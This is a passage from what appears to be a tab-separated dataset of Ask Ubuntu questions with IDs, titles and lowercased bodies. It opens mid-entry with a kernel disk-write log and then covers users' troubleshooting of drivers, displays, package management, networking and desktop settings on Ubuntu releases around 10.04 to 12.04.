) [ 74568.992815 ] flush-252:0 ( 1233 ) : write block 24 on dm-0 ( 8 sectors ) [ 74568.992821 ] flush-252:0 ( 1233 ) : write block 48 on dm-0 ( 8 sectors ) [ 74568.992827 ] flush-252:0 ( 1233 ) : write block 8388736 on dm-0 ( 8 sectors ) [ 74568.992833 ] flush-252:0 ( 1233 ) : write block 8388864 on dm-0 ( 8 sectors ) [ 74568.992840 ] flush-252:0 ( 1233 ) : write block 8454400 on dm-0 ( 8 sectors ) [ 74583.761611 ] jbd2/dm-1-8 ( 1207 ) : write block 730185808 on dm-1 ( 8 sectors ) [ 74583.761703 ] md2_raid1 ( 381 ) : write block 8 on sdc1 ( 2 sectors ) [ 74583.761742 ] md2_raid1 ( 381 ) : write block 8 on sda1 ( 2 sectors ) [ 74584.205263 ] jbd2/dm-1-8 ( 1207 ) : write block 730185816 on dm-1 ( 8 sectors ) [ 74584.205607 ] jbd2/dm-1-8 ( 1207 ) : write block 730185824 on dm-1 ( 8 sectors ) [ 74584.440542 ] md2_raid1 ( 381 ) : write block 8 on sdc1 ( 2 sectors ) [ 74584.440561 ] md2_raid1 ( 381 ) : write block 8 on sda1 ( 2 sectors ) [ 74593.954005 ] flush-252:0 ( 1233 ) : write block 55173288 on dm-0 ( 8 sectors ) [ 74595.844921 ] console-kit-dae ( 1953 ) : dirtied inode 1573426 ( history ) on dm-0 [ 74595.844932 ] console-kit-dae ( 1953 ) : dirtied inode 1573426 ( history ) on dm-0 [ 74595.844936 ] console-kit-dae ( 1953 ) : dirtied inode 1573426 ( history ) on dm-0 [ 74606.894208 ] jbd2/dm-0-8 ( 436 ) : write block 55173288 on dm-0 ( 8 sectors ) [ 74606.894300 ] jbd2/dm-0-8 ( 436 ) : write block 143068696 on dm-0 ( 8 sectors ) [ 74606.894347 ] jbd2/dm-0-8 ( 436 ) : write block 143068704 on dm-0 ( 8 sectors ) [ 74606.894353 ] jbd2/dm-0-8 ( 436 ) : write block 143068712 on dm-0 ( 8 sectors ) [ 74606.894358 ] jbd2/dm-0-8 ( 436 ) : write block 143068720 on dm-0 ( 8 sectors ) [ 74606.894363 ] jbd2/dm-0-8 ( 436 ) : write block 143068728 on dm-0 ( 8 sectors ) [ 74606.894368 ] jbd2/dm-0-8 ( 436 ) : write block 143068736 on dm-0 ( 8 sectors ) [ 74606.894372 ] jbd2/dm-0-8 ( 436 ) : write block 143068744 on dm-0 ( 8 sectors ) [ 74606.894376 ] jbd2/dm-0-8 ( 436 ) : write block 143068752 on dm-0 ( 8 sectors ) [ 74606.894644 ] jbd2/dm-0-8 ( 436 ) : write block 143068760 on dm-0 ( 8 sectors ) [ 74614.202984 ] flush-252:1 ( 1234 ) : write block 461373696 on dm-1 ( 8 sectors ) [ 74614.203067 ] md2_raid1 ( 381 ) : write block 8 on sdc1 ( 2 sectors ) [ 74614.203106 ] md2_raid1 ( 381 ) : write block 8 on sda1 ( 2 sectors ) [ 74614.826060 ] md2_raid1 ( 381 ) : write block 8 on sdc1 ( 2 sectors ) [ 74614.826081 ] md2_raid1 ( 381 ) : write block 8 on sda1 ( 2 sectors ) [ 74640.778344 ] flush-252:0 ( 1233 ) : write block 50331656 on dm-0 ( 8 sectors ) [ 74640.778364 ] flush-252:0 ( 1233 ) : write block 50332184 on dm-0 ( 8 sectors ) [ 74640.778372 ] flush-252:0 ( 1233 ) : write block 50332640 on dm-0 ( 8 sectors ) [ 74640.778379 ] flush-252:0 ( 1233 ) : write block 50600112 on dm-0 ( 8 sectors ) [ 74640.778385 ] flush-252:0 ( 1233 ) : write block 54525960 on dm-0 ( 8 sectors ) [ 74640.778391 ] flush-252:0 ( 1233 ) : write block 54526440 on dm-0 ( 8 sectors ) [ 74640.778402 ] flush-252:0 ( 1233 ) : write block 16 on dm-0 ( 8 sectors ) [ 74745.127994 ] udev-acl.ck ( 13987 ) : dirtied inode 327956 ( database ) on tmpfs [ 74745.131156 ] console-kit-dae ( 1953 ) : dirtied inode 1573426 ( history ) on dm-0 [ 74745.131166 ] console-kit-dae ( 1953 ) : dirtied inode 1573426 ( history ) on dm-0 [ 74745.131170 ] console-kit-dae ( 1953 ) : dirtied inode 1573426 ( history ) on dm-0 thank you so much for taking a look .
123745	ubuntu can not properly detect the external monitor due to broken laptop screen	i have a dell m1530 , which has windows 7 and ubuntu 11.10 installed on it . the screen on my laptop no longer works but the external monitor works fine , well , almost . the resolution is set to 1024x768 even though my monitor can handle 1920x1200 . i 've tried using xrandr but it 's unable to identify my monitor , and so i ca n't change the external monitor settings . i get an error which goes something like `` xrandr : failed to get size of gamma for output default '' and then some screen resolutions which my laptop screen supports but my external monitor only supports a few of them . i have a feeling that this is happening because of some sort of conflict because of the broken laptop screen . i know that windows 7 is able to detect the broken laptop screen , and this is why i have an inclining that ubuntu is getting `` confused '' . is there a solution to this or can i just unplug the laptop screen from the motherboard ?
123749	upgrading ubuntu after official support period has ended	i am using ubuntu 10.10 , for which the official support period is over . when running the upgrade manager , i also can not see the option to upgrade to a newer version , are you aware of any alternatives for upgrading .
123752	purchasing additional cloud storage from ubuntuone ?	this may be a dumb question , however when you do n't know the answer , what can you do but ask ? if i purchase additional 20gb storage space , am i getting an additional 15gb space ( on top of my 5gb free storage ) or do i retain my 5gb free storage and have a total of 25gb ?
123759	how do i disable the startup sound in ubuntu 12.04 login-screen ?	i would like to know how to disable the startup sound in ubuntu 12.04 login-screen ; that is , the sound produced at the login-screen before the login . please note , however , the login sound is the sound produced by the system after the login . the following question covers the procedure on how to disable the login sound in ubuntu 11.10 and earlier versions : how to disable login sound ?
123764	ca n't select ubuntu menu categories to show	when i tick a checkbox to show ubuntu 10.04 menu category , the checkbox unticks itself after a couple of seconds . gif of screen . is there any other way to edit ubuntu menu categories or add a category ? lxmenueditor does n't work on my system ( i get unable to access jarfile /opt/lxmed/lxmenueditor.jar when trying to launch it , probably because it requires sun 's jre ) . i 'm using ubuntu 10.04 for ppc .
123765	is ubuntu one available for aptosid or siduction ?	i 'm a happy ubuntuuser since years and i use of course ubuntuone . in my profession i have to work with microsoft xp and 7 , but also with aptosid and siduction ( debian-based ) . i 'm very surprised , that i # m not able to install ubuntuone onto the last operatingsystems . is there any simple way to get rid of this `` illness '' ?
123766	is is possible to modprobe a module from the boot loader ?	i want to modprobe a module from the kernel command line ( in my case yaboot , but you are probably more familiar with grub ) . this is for a workaround for the live cd . i 've seen some old advice that says this is possible in ubuntu . however , it does n't seem to work for me . the module i want to load is a framebuffer ( so it is normally blacklisted ) . i do n't know if that complicates things , but i ca n't seem to modprobe any module from the kernel command line . is there any other command line that would do it ? does anybody know if this is possible , and how you would do it ? thanks .
123768	i ca n't log in to ubuntu one from windows client	i needed to uninstall , and reinstall u1 , in windows 7 , then i have to wait on the `` getting info , please wait '' screen , after this , when i want to log in , then it says , `` authentication failure '' . then i tried to reset my passworld , and then it tells me , i 'm not even registered . from the web interface , i can log in . anyone has ever experienced this problem ?
123787	software centre not working	i am a new user of ubuntu and have been having problems with the software centre . it closes when i try to install anything and gives me this error in xterm : reading package lists ... error ! w : gpg error : http : //security.ubuntu.com precise-security release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : ://us.archive.ubuntu.com precise-updates release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //us.archive.ubuntu.com precise-backports release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_precise-updates_main_binary-i386_packages e : the package lists or status file could not be parsed or opened please , what can i do ? i have tried sudo apt-get update -- f to check and repair corrupt packages , but to no avail .
123789	what is a commandline utility to shorten input ?	what 's a commandline tool to take input from stdin , remove the first x character , and place the output to stdout ? similar to how tail can skip the x lines and display the rest , but for characters on each line instead of lines in each file .
123796	does n't boot after 11.04 install	after i install it from a burned cd into my vaio laptop ( the process is normal , ubuntu boots off cd ) after a full install , i restart , shows viao screen then goes straight to the black screen with the cursor and stays that way
123798	how to hear my voice in speakers with a mic ?	i have a usb microphone that i can chat on skype , record sound etc . but how can i make it so that when my mic is on and i speak , î hear it in speakers live without having to record my voice first and then play it back ? what apps do i need or where can i enable this option ? i 'm running ubuntu 10.10
123800	how to enable screen brightness control ?	i have an hp pavilion dv7 , i ca n't control the screen brightness not using special keys and not using the option in the system settings , i see the bar moving but the brightness does n't change ... what can i do ? solution modify the file : /etc/default/grub find the line : grub_cmdline_linux_default= '' quiet splash '' correct that line like this : grub_cmdline_linux_default= '' quiet splash acpi_backlight=vendor '' command : sudo update-grub restart
123803	how to switch out a backtrack distro ? ( multiple ideas )	got myself in a little over my head in partitions . currently i have an ubuntu 11.10 distro and a backtrack distro on my hard drive . i ca n't run diablo 3 on a virtual box successfully , so i made a backtrack virtualbox . i 've still got the windows installation cd 's that came with the computer , so my question is how should i go around switching my partition from backtrack/ubuntu to windows/ubuntu ? heres what my gparted window looks like : /dev/sda1 is file system ext4 and is my ubuntu partition /dev/sda2 is file system extended and is my backtrack partition , it has alot of partitions under it ... sdas 5 6 and 7 , where 5 and 7 are linux-swap , 6 is ext4 im worried that if i try and delete my backtrack partition i 'm going to run into problems booting my drive . am i right in this fear ?
123808	can i install ubuntu on a partition formatted as ntfs instead of ext4 ?	can i install ubuntu on a partition formatted as ntfs , instead of ext4 ? after installing ubuntu 11.10 using ext4 , i keep on getting disk errors at boot up . but on this same harddrive , i have windows 7 , and i do n't get these errors . so i wanted to try ntfs , instead of ext4 , and see if it makes any difference . the harddrive is about 5 years old . so if it is failing , i would think it would be giving trouble in windows just as well .
123809	gedit stating that its unable to retrieve file info even though it works	while this is n't causing any serious issues ( that i 've seen so far ) , it is aggravating me because its taking over the terminal window that i was working on with the warning : ( gedit:3288 ) : gtk-warning ** : unable to retrieve the file info for `file : ///home/amn/programming/java/myliero/driver.java ' : error stating file '/home/amn/programming/java/myliero/driver.java ' : no such file or directory however , the file opens up fine and is editable/savable and everything still exists after the program is closed . when you start the program again , it still sees everything and no more errors come about . this error only appears when you create directories - it does n't matter if the saved item occurs within the directory or not .
123811	ubuntu doesn’t load after install nvidia graphic drivers	i have installed nvidia drivers on ubuntu 11.10 . i have referred following article which describes “the advanced way of installing nvidia drivers in ubuntu ( only recommended if you need the latest drivers or run a custom kernel. ) ” . it was installed successfully but unfortunately ubuntu doesn’t load . when i started my laptop it stops in a screen that says me * ( ... ) * starting bluetooth * pulseaudio configured for per-user sessions saned disabled ; edit /etc/default/saned ) *stopping save kernal messages [ ok ] *starting cups printing spooler/server [ ok ] * ( ... ) checking for running unattended-upgrades : *stopping failsafe boot delay [ ok ] * ( … ) *starting deferred execution scheduler [ ok ] then it’s hanging on and doesn’t go forward . my graphic driver is nvidia geforce gt525m and 64bit dell inspiron n5110 laptop . i would appreciate if anybody can give advice on this matter . thank you in advance .
123813	how can i setup ubuntu ( and my home network router settings ) so i can ssh to linux console window ?	i installed ubuntu version 11 not too long ago . i now have that computer running on my home network and it has it 's own internal ip address on my home network behind a linksys router . how can i configure that linux machine and my network settings so that i can ssh ( using an emulator like putty or reflection ) into that machine ? i 'd rather not use vnc just to get access to its console window . ==================== update 4/20/2012 @ 3:16pm c : \windows\system32 > ping 192.168.1.103 pinging 192.168.1.103 with 32 bytes of data : reply from 192.168.1.103 : bytes=32 time=2ms ttl=64 reply from 192.168.1.103 : bytes=32 time=2ms ttl=64 reply from 192.168.1.103 : bytes=32 time=1ms ttl=64 reply from 192.168.1.103 : bytes=32 time=1ms ttl=64 ping statistics for 192.168.1.103 : packets : sent = 4 , received = 4 , lost = 0 ( 0 % loss ) , approximate round trip times in milli-seconds : minimum = 1ms , maximum = 2ms , average = 1ms c : \windows\system32 >
123816	switching over to ubuntu wanting advise	i am planing on switching over to ubuntu on a older laptop i have that has aa few issues right now i figured wiping the os clean was an easier move . since i do n't have the money for a new lap top right now . i know i will need to back up my stuff thats not an issue what i am wondering there are several programs i use i am wondering if they will work on ubuntu or not namely : firefox , adobe reader , microsoft office , gimp , world of warcraft . these are the main programs i want to bring over and keep i am wondering if they can be used on ubuntu and if i need to do anything special to make them work . any help at all would be wonderful thanks .
123817	poor result after installation	i just have downloaded ubuntu 11.10 on my old 5.10 version , and successfuly burned in on to dvd , and installed 11.10 instead , after successful installation i was forced to restart pc , my dvd had been ejected . after restart pink screen appeared , was blank all the time , so i decided to restart again , this time i was able to select between 4 possibilities ubuntu with linux 3.0.0-12-generic ubuntu with linux 3.0.0-12-generic ( recover mode ) memory test memory test ... i selected first and pressed enter to boot , but still no results , black screen appears after few seconds , saying `` busybox ( ... ) type help for commands '' after next seconds its flooded by logs saying something about killing or terminating signals , and nothing . i have no idea what can i do , i will be grateful for some tips , i 'm real beginner with linux . thanks
123818	my update manager say `` requires installation of untrusted packages ''	i am new to linux and have little to some of information on commands at this point . i have managed to install ubuntu 10.10 about a 4 days ago and have successfully installed all the updates that same day- via the terminal . now today i got 5 updates and wil not let me install them by any commands i give it . upadate manager say requires installation of untrusted packages . the terminal say : sudo apt-key adv -- recv-key -- keyserver keyserver.ubuntu.com 40976eaf437d05b5 executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /tmp/tmp.uwszw2lg76 -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- recv-key -- keyserver keyserver.ubuntu.com 40976eaf437d05b5 gpg : requesting key 437d05b5 from hkp server keyserver.ubuntu.com ? : keyserver.ubuntu.com : connection refused gpgkeys : http fetch error 7 : could n't connect : connection refused gpg : no valid openpgp data found . gpg : total number processed : 0 can someone help me fix this .
123824	where does transmission save my torrent files ?	i have a lot of torrents and currently i am using transmission as my torrent client , there is a problem that after i change the the folder name ( this is important for me to organize my music folder ) transmission stop recognize the files although they remained the same . so i desire to change client but i ca n't find the torrent files where can i find them ?
123833	how do i connect my toshiba thrive to my kubuntu 11.04 box ?	i 've recently gotten a toshiba thrive 10.1 '' 16gb , and i love the thing . unfortunately , i 've got one minor complaint : while i can physically hook up the tablet through miniusb , no drives show up in device notifier . is it lack of driver , wrong configuration , something else ?
123835	gcc-arm-linux-gnueabi package not found on 10.04 lts ( lucid )	i am trying to install the gcc-arm-linux-gnueabi package , but this is the error i am getting : $ sudo apt-get install gcc-arm-linux-gnueabi reading package lists ... done building dependency tree reading state information ... done e : could n't find package gcc-arm-linux-gnueabi i tried a couple of other packages like apt-cross and they got installed easily , but this package is not found . based on info here this package should be available in lucid . any thoughts on this ? edit : sudo apt-get update did not help . ubuntu 10.04 , 64-bit machine thanks !
123837	why i ca n't see any videos online ?	i was using ubuntu 11.04 and everything was ok . suddenly ( after an update , i think ) i was unable to see any video ( any website ) using firefox . i decided to do a clean , new installation ( from cd ) of ubuntu 11.10 and the problem is exactly the same no videos on firefox ( no matter website ) i already tried flash-aid with beta versions and stable versions and nothing . i 'm a pretty new ubuntu ( linux ) user . any help and/or advice please ? ? ? ?
123839	how to remove transparency from a gtk theme ?	i 'm running xubuntu 11.10 and i 've got this here gtk theme which is pretty nice , and i like the title bars and everything , but i 've got a problem . every menu in the entire system has this weird and annoying translucent effect . i do n't want this effect . i 've pored through the gtkrc for the theme for hours now and turned up nothing , i 've googled and googled , i 've tried editing the pixmaps to remove the transparency but nothing i do makes any difference . each time i make any change , i reload the theme by changing it in xfce-appearance-settings and then changing it back . i have confirmed this does reload the theme properly by making other minor changes . does anyone know how i can remove the transparency from this theme ? here 's a pastebin of the gtkrc if it helps : http : //pastebin.com/qva6lpzn pastebin of menubar.rc : http : //pastebin.com/s91cq3t5 pastebin of panel.rc : http : //pastebin.com/pqghvpuy dropbox of ~/.config/xfce4 : https : //www.dropbox.com/s/b3vwcrohi0zdcb2/xfce4.tgz below is depicted a screenshot of the problem , demonstrated using a pop-up menu . note that it applies to all menus - application menus , the main application menu and pop-up menus . background faded and image zoomed/cropped to highlight the issue , otherwise unedited as you can see , the page behind the menu is visible through the menu - this is what i do not want . how i installed it : ~/downloads $ tar xzf 58426-fawn.tar.gz ~/downloads $ cp -r fawn ~/.themes/ i then used xfce4-appearance-settings and selected fawn from the menu . i tried editing the pixmaps in ~/.themes/fawn/gtk-2.0/menu-menubar/ and exploring the gtkrc in ~/.themes/fawn/gtk-2.0/ .
123842	how to open the same document in evince/gedit multiple times ?	i want to open a pdf file multiple times with evince . i want to do this to be able to look at different sections of the same file at the same time . everytime i try to open the file again , it only brings up the already opened evince window with my pdf file . i also tried to open a new evince window and then opening my file by using the menu of evince . is there any possibility to do this ? i also have the same issue with gedit . i managed to open the same text file twice , but everytime i save my file an annoying bar in the other window tells me that my file was modified .
123844	mounted ntfs filesystem takes up /home space .	i have a 500 gig hard drive , ubuntu on it and i need to use as much space at my home dir as possible , however , my home dir somehow has only 15 gigs of usable space . when i run gparted , i see three partitions 1 meg of `` unallocated '' space , 128 megs of unknown filesystem space and then the remaining 465 gigs of ntfs filesystem mounted on /host . i assume that in this configuration the /home directory could possibly contain all of the 465 gigs , but it has only 15 gigs . i made a wubi install , i installed ubuntu on my first 500 gig harddrive from my second windows7 hdd ( also 500 gigs ) . now i have two oses , each is on its own hdd . my intent was not to replace win7 . ps : apologies , by 500 gigs i meant 465.76 gigs , 500 gigs is said in specs ; ) . is it still true that i need to reinstall ubuntu not using wubi ?
123846	nvidia quadro 4000 graphics card not working	i have a new home build with the following hardware : memory : ( 16gb - 2 of corsair vengeance 8 gb ( 2 x 4 gb ) ddr3 1866 mhz ( pc3 15000 ) 240-pin ddr3 sdram ) mobo : ( asus lga 1155 - z68 - pcie 3.0 and uefi bios intel z68 atx ddr3 2200 lga 1155 motherboards p8z68-v pro/gen3 ) cpu : ( intel core i7-2700k 3.5 ghz lga 1155 processor bx80623i72700k ) graphics card : ( nvidia quadro 4000 by pny 2gb gddr5 pci express gen 2 x16 dvi-i dl , dual displayport and stereo opengl , directx , cuda , and opencl profesional graphics ) hdd : ( seagate 1tb sata ) dvd drive : ( lite-on lightscribe 24x sata dvd+/-rw dual layer drive ihas424-98 ) i tried to install ubuntu 11.10 by downloading the iso file and burning a dvd . it starts with the first screen ( install ubuntu , try without install and check drive ) . if i select either of this the dvd drive blinks for a while and then system freezes . no installation ! after some search , i found the graphics card is conflicting . so i removed the graphics card ( nvidia quadro 4000 ) and booted the install dvd . everything worked fine and i was able to install ubuntu 11.10 . but this way i can not use the nvidia graphics card . any help in fixing this will be very much appreciated thx
123851	sharing folders on home network between ubuntu machines is not permanent after restart	i run a home network with a desktop pc and 2 laptops all running ubuntu 11.10 . i set up a shared folder on the desktop pc through nautilus - > sharing options . that folder is readily accessible from the laptops . sofar creating a shared folder was easy and data exchange works fine in all directions . the problem is that the sharing settings are not permanent and the folder has to be marked as shared every time after restart of the desktop pc . how can i make the folder a permanently shared folder that remains shared after startup of desktop pc . is there an easy way ? ( no windows folder ( ntfs ) in network , file system is exe4 across all machines , no virtual machines ( vbox ) running )
123859	where can i get wimax-tools ?	linuxwimax.org has been down for ages , is there anyway i can get the wimax daemon and wimax-tools so i can use my intel 6250 ?
123860	pixel shader to opengl converter	i am running ubuntu 11.10 on my computer and i would like to emulate a wii . i have a wii emulator running successfully on ubuntu , but it requires pixel shader . i am most sure that my graphics card has opengl , but am also sure that it does n't have pixel shader . it would be very helpful if there was a driver that tricked the emulator that i have pixel shader , when i am infact using opengl for the animation .
123863	set window properties ( above , on all workspaces ) in js/gnome-shell-extension ?	as part of teaching myself how to make gnome-shell-extensions , i 'd like to be able to tell a window to be on all workspaces on on top of all other windows . i notice in the mutter api there is a meta_window_set_above in window.c but this does n't seem to be exposed to the js interface . through a bit of trial and error i also seem to be able to call window.set_property ( 'above ' , true ) but this function appears to do nothing ( there is a 'title ' property i tested on and using set_property on this seems to do nothing ) . so , does anyone know of an alternate way to set a window 's properties in a gnome shell extension ? ( and how to tell whether a function in the api gets exposed through javascript ? i ( naively ) thought it 'd be as easy as `` oh , there 's a meta_window_set_above in window.c , so i must be able to call window.set_above ( true ) , but i guess not .
123867	keyboard map is incorrect when using an nx-client	i have a problem with nomachine nx-client in ubuntu . it seems that the keymapping has a problem . for example , the arrow keys do not work ( except for up key which opens printscreen ! ) . i searched online and found several solutions . however none of them worked for me : solution 1 ) on the server , change system- > preferences- > keyboard- > layouts to “evdev-managed keyboard” the server that i log into has centos 5.7 on it and i can not find “evdev-managed keyboard” layout in keyboard setting . i tried several other generic keyboard layouts with no success . solution 2 ) add the following lines to /etc/x11/xorg.conf : section `` serverflags '' option `` autoadddevices '' `` false '' endsection i did it and my keyboard stopped working completely ! i had to use the on-screen keyboard to remove this setting and get back to normal . solution 3 ) run xmodmap -pke > localxmodmap locally copy the file to server as .xmodmap run xmodmap ~/.xmodmap from terminal . which gives me a bunch of errors such as : xmodmap : /home/fzc23/.xmodmap:60 : bad keysym name 'xf86switch_vt_1 ' in keysym list and does n't work . i do not know what else to do . i would appreciate if somebody could help me out . btw , the nx-client on windows connects to the same server with no keymapping problem so i believe this is a problem in ubuntu and has nothing to do with the server side .
123874	applications wo n't install due to failed previous install	an application that never finished installing is preventing me from getting new applications and i ca n't seem to fix this . how do i fix my issue ? please note that i can not install via either the package manager or add/remove applications .
123879	how can i lock down ubuntu ?	i am working on a small project . i have about 20 computers with ubuntu 10.04 on them , which will be used in a computer lab for elementary , middle , high school and college kids . some seniors and new computer-users will be using the computers . i want to lock-down the computers for so children and people who want to play around with pc configuration can use them securely and without breaking them . i therefore want to restrict user privileges , removing the ability to upgrade , add/install software or otherwise personalize the lab 's computers . the only uses for these computers should be : access to school websites for access of e-text books ( homework assignments ) access to learning-aid websites ( such as www.math.com or webster.com ) access/restrictions to applications that are safe and appropriate for the elementary students . for more senior users only , access to websites for completing applications for re-certifications of say food stamps , medicaid and so on . are there any software packages that will let me do this ?
123881	how do i run and ubuntu desktop in ec2 ?	we have implemented a cloud using the ubuntu server and amazon , we installed the uec image given by amazon of ubuntu 9.04 , we were successfull in accessing through the terminal by using it as ubuntu @ but failed to virtualize the environment like we get in the virtual box on client system . please suggest me a way
123885	does programs installed through software-center get updated ?	is `` every and all '' installed applications/programs once installed through ubuntu software center are monitored and routinely updated through the ubuntu ( specifically , the update manager ) on a ubuntu 11.10 64-bit operating system ? or are there `` a few exceptions '' to this where there may be the case where some circumstances of applications/programs installed through software center may not be updated through ubuntu ( specifically , the update manager ) ? please explain . thank you !
123886	difference of output of apt-rdepends and apt-get install	when i issue the command apt-rdepends -p python-epydoc | grep notinstalled i get the below output $ apt-rdepends -p python-epydoc | grep notinstalled reading package lists ... done building dependency tree reading state information ... done depends : debconf-2.0 [ notinstalled ] depends : debconf-english [ notinstalled ] predepends : perlapi-5.10.0 [ notinstalled ] depends : perlapi-5.10.0 [ notinstalled ] depends : perlapi-5.10.0 [ notinstalled ] depends : debconf-2.0 [ notinstalled ] depends : debconf-2.0 [ notinstalled ] when i issue sudo apt-get install python-epydoc $ sudo apt-get install python-epydoc reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : blt graphviz lacheck latex-beamer latex-xcolor lmodern luatex pgf preview-latex-style prosper ps2eps python-docutils python-lxml python-pygments python-roman python-tk tcl8.5 tex-common texlive-base texlive-binaries texlive-common texlive-doc-base texlive-extra-utils texlive-font-utils texlive-fonts-recommended texlive-fonts-recommended-doc texlive-generic-recommended texlive-latex-base texlive-latex-base-doc texlive-latex-extra texlive-latex-extra-doc texlive-latex-recommended texlive-latex-recommended-doc texlive-luatex texlive-pictures texlive-pictures-doc texlive-pstricks texlive-pstricks-doc tipa tk8.5 suggested packages : blt-demo graphviz-doc auctex texlive-lang-french epydoc-doc python-profiler python-lxml-dbg python-chardet tix python-tk-dbg tclreadline debhelper perl-tk dvidvi fragmaster latexmk xindy purifyeps psutils t1utils texpower the following new packages will be installed : blt graphviz lacheck latex-beamer latex-xcolor lmodern luatex pgf preview-latex-style prosper ps2eps python-docutils python-epydoc python-lxml python-pygments python-roman python-tk tcl8.5 tex-common texlive-base texlive-binaries texlive-common texlive-doc-base texlive-extra-utils texlive-font-utils texlive-fonts-recommended texlive-fonts-recommended-doc texlive-generic-recommended texlive-latex-base texlive-latex-base-doc texlive-latex-extra texlive-latex-extra-doc texlive-latex-recommended texlive-latex-recommended-doc texlive-luatex texlive-pictures texlive-pictures-doc texlive-pstricks texlive-pstricks-doc tipa tk8.5 0 upgraded , 41 newly installed , 0 to remove and 68 not upgraded . need to get 370mb/436mb of archives . after this operation , 724mb of additional disk space will be used . do you want to continue [ y/n ] ? the output of apt-get install says that i have to install packages that were not given by the command apt-rdepends -p python-epydoc | grep notinstalled . should n't the notinstalled packages in the former command and the packages to be installed in the latter command be the same ? if so , what is the reason for the difference ?
123895	nautilus explorer looking weird	my nautilus ( file explorer ) looks weird suddenly , even after a reboot.. ubuntu 11.10
123902	would i be able to get the final release of ubuntu 12.04 if i upgrade now ?	as ubuntu 12.04 is in the final beta testing now , i was wondering that if i upgraded the distribution on my machine ( ubuntu 11.10 now if that info is needed ) , then would i be able to update to the final release through my software update channel or would i have to reinstall the os ?
123903	how do i stream a video torrent ?	is there a software/s to stream a video torrent like utorrent on windows ?
123905	set gedit to format java and c # code	i found this link http : //live.gnome.org/gedit/externaltoolsplugincommands # source_code_automatic_formatter where i was suppose to get a command for astyle to make gedit format java or c # code . however , i am unable to get the right parameters for astyle . even tried the combination for c language , but it just does not work . other gedit external tool scripts ( like xml formatting ) work fine . can anyone share his own script or trick to format java or c # code ?
123906	software for speech transcription	i have a bunch of audio files contained ordinary speech , mainly in mp3 format which i 'd like to convert to text . does anyone know of software that can do this ?
123907	i/o disk error when resume from hibernate/suspend on battery power notebook	the problem is appearing only on battery power when i resume laptop from hibernate/suspend . ubuntu starts normally , i can login , unity starts and ... sometimes in different time orders system freeze . i ca n't do anything . when i push ctrl+alt+f2 insted of console with login prompt i get message for example i/o disk error read from 12347586 . it looks like hard disk hardware problem ( bad sectors ) but i check and disk is good . on power pack i do n't have that issue . that is my first serious contact with ubuntu . earlier i had ubuntu 11.10 for few days . from what i remember i do n't have that problems with 11.10 . i installed ubuntu 12.04 manually . swap size is right . it 's look like power menagment problems with disk acces on battery power . system ubuntu 12.04 latitude xt c2d ulv 1.33 3gb ram disk zif pata 120gb ati x1250 whether somebody can help me ? i am greeting mikolaj
123908	scanner not working for cannon image class mf4412	i recently switched from windows vista to ubuntu 11.10 . i realized that my printer/scanner/photocopier was not working.i went on www.canon-asia.com and downloaded the driver for the printer.now the printer is working fine.but the site doesnt have a driver for the scanner for linux and xsane is not detecting my scanner . i tried running the windows and mac version of the driver through wine and acetoneiso but to no avail . please help me out . i really need my scanner to work thanks
123916	how do i move the status icons to the top ?	i 'm not sure of any of the terminology , so i 'll have to explain things simply , to make sure you understand what i 'm saying . i 'm using gnome 3 , and when i bring the mouse to the bottom right of the screen , a bar pops up , with icons of some things that are running in the background ( at the moment , mine has `` update manager '' , `` removable devices '' , `` caffeine-cup '' ) . is there any way to move these items to the bar at the top of the screen , alongside the icons for volume , network connectivity and universal access ( how do i get rid of that btw ) ?
123918	gnome-panel does n't exist anymore ?	i wanted to install gnome classic in ubuntu 12.04 , searched on the ubuntu software centre , and it is not there . i also tried sudo apt-get install gnome-panel and it can not be found there also . i also tried installing it on synaptic package manager , and it is not there either . is this a problem with the download server , or is it not being distributed or something ? is there like a .deb file i can install it from ? edit : it seems gnome desktop environment is also unavailable .
123919	how can i mount a shared partition with nobody.nogroup ?	i 've successfully shared a dedicated partition using samba , setting new files & directories ownership to nobody.nogroup . how can i edit fstab to make the local user work with the partition using the same permissions ? currently , files created locally are being created with the local user as the owner , thus disabling my ability to manage them remotely . thanks
123925	television on linux with tv-tuner ? how can i find a way to use it ?	i would like to watch television with my tv-tuner . all i want is someone give me some steps to follow so i can find a driver . i am searching for several months but nothing . also which application should i use for tv in linux ?
123928	can not boot ubuntu 11.10 from external usb hdd	i 've just installed ubuntu 11.10 x64 on a 200gb partition of my 2tb external usb hdd . everything went smoothly . after restarting the computer , i tried hitting f12 and choosing usb hdd . something like 'loading operating system ' showed up , then it booted into windows . what did i do wrong ?
123934	touchpad autoclicks on kubuntu 11.10	i 've got an etps/2 elantech touchpad which works fine in windows . since my first install of ubuntu , and even now on kubuntu , it randomly autoclicks . even the type of click is random , because sometimes it just moves my caret , but it also happens that i find something pasted in the wrong place , as if it autoclicked with two fingers ( 2 fingers tap pastes from clipboard ) . i removed kmousetool , believing that it 's accessibility features where the problem , but i still got it , so i do n't know what to do . is there any solution ? it 's making hard to work with netbeans because it pastes code at random -.- thanks : )
123937	rtl8188cus wireless usb dongle does n't work unless i disable wireless security	i have a digitus dn7045 wireless usb dongle which uses the realtek rtl8188cus chipset . if i disable security on my wireless network , it works fine . as soon as i enable any type of security , it stops working and network manager keeps asking for my network key/password over and over again . the same dongle works fine on windows with or without security and i 've already updated to the latest driver ( 8192cu ) from realtek.com.tw and i 've already blacklisted the default driver , rtl8192cu . none of this has helped but , like i said , it is working , just not with security enabled . what can i try next ?
123938	system completely hangs sometimes on an asus x54h	i have installed ubuntu 11.04 through usb stick on my asus x54h laptop.every thing is going fine but sometimes the system hangs up with the complete black screen , after that it does not respond any keys.can some one tell me how it is doing like this ? how to solve this ? any help will be highly appreciable .
